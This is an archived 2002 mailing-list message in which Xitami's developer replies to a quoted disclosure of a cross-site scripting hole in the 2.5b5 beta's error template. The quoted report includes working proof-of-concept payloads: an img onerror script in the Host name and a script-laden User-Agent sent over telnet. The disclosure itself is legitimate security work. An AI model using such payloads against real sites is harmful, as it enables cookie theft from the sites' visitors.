[Xitami] Re: Errors.gsl Script Injection Vulnerability

Pieter Hintjens xitami@lists.xitami.org
Mon, 17 Jun 2002 09:44:58 +0200

Previous message: [Xitami] htaccess
Next message: [Xitami] Xitami and PHP ??
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Matthew,

Thanks for reporting this security hole.  Xitami 2.5b5 is a beta and 
as such we do not recommend its use for production or public web 
sites.  The production release of Xitami (2.4d9) does not use GSL and 
is not subject to this attack.

You should also note that the supplied script is an example that is 
intended to show the available fields, and not hard-coded.  The web 
site manager can easily remove references to any or all information 
coming from the browser.  Further, GSL processing for errors is 
disabled by default.

However, we're grateful for your work and we will make changes to the 
2.5b package to filter all information received from the browser 
before showing it in error screens.

I am forwarding this message to the Xitami discussion list, since we 
do not believe it serves our users to hide information about such 
vulnerabilities.

Best regards,
-
Pieter Hintjens
iMatix Corporation


> There is a security hole in the 'errors.gsl' template that ships
> with Xitami 2.5b5 that may allow an attacker to run scripts
> against visiting users in the security zone of the targeted site; this
> allows for cookie theft, and other malicious actions.  My site,
> www.murphy.101main.net runs the Beta:
> 
> http://www.<IMG%20SRC=""%20ONERROR="alert%28'CSS'%29">.murphy.101main.
> net/er ror404
> 
> The "/error404" throws a 404 error and Xitami returns the
> following output:
> 
> <HTML><TITLE>Error</TITLE><BODY><H1>
> <HTML><BODY>
> <H2>Error 404</H2>
> <H3>Not found</H3>
> <P>
> <HR>
> <TABLE>
> <TR><TD>Server       </TD><TD>Xitami</TD></TR>
> <TR><TD>Version      </TD><TD>2.5b5</TD></TR>
> <TR><TD>Name         </TD><TD>www.<img src=""
> onerror="alert('css')">.murphy.101main.net</TD></TR>
> <TR><TD>Full URL     </TD><TD>http://www.<img src=""
> onerror="alert('css')">.murphy.101main.net/</TD></TR>
> <TR><TD>HTTP port    </TD><TD>0</TD></TR>
> <TR><TD>Protocol     </TD><TD>HTTP/1.1</TD></TR>
> <TR><TD>Your IP      </TD><TD>65.28.45.230</TD></TR>
> <TR><TD>Your browser </TD><TD>Mozilla/4.0 (compatible; MSIE 6.0;
> Windows 98; Win 9x 4.90; .NET CLR 1.0.3705)</TD></TR> </TABLE>
> </BODY></HTML>
> 
> As you can see, this results in code injection because a NULL image
> fires the onError event, which displays the message, meaning that JS
> code is executed in the name of the site by the attacker against the
> visiting browser.  Also, no filtering is applied on the User-Agent
> that the server accepts for the error.  Take for example this Telnet
> session:
> 
> telnet localhost 80
> GET /error404 HTTP/1.0
> User-Agent: <SCRIPT>alert("UA Attack");
> 
> The HTTP protocol is not vulnerable; this seems to be replaced with
> "HTTP/1.1" when an invalid value is supplied:
> 
> telnet localhost 80
> GET /error404 HTTP/<SCRIPT>alert("Protocol Attack");</SCRIPT>
> 
> This does nothing.
> 
> I have published an alert (no technical details) on my site here:
> 
> http://www.murphy.101main.net/vna-xitami.txt
> 
> I also plan to submit this alert to BugTraq and SecuriTeam
> immediately. If no reply is received within 7 days, technical details
> will be released to the public.
> 
> "The reason the mainstream is thought
> of as a stream is because it is
> so shallow."
>                      - Author Unknown
>

Previous message: [Xitami] htaccess
Next message: [Xitami] Xitami and PHP ??
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]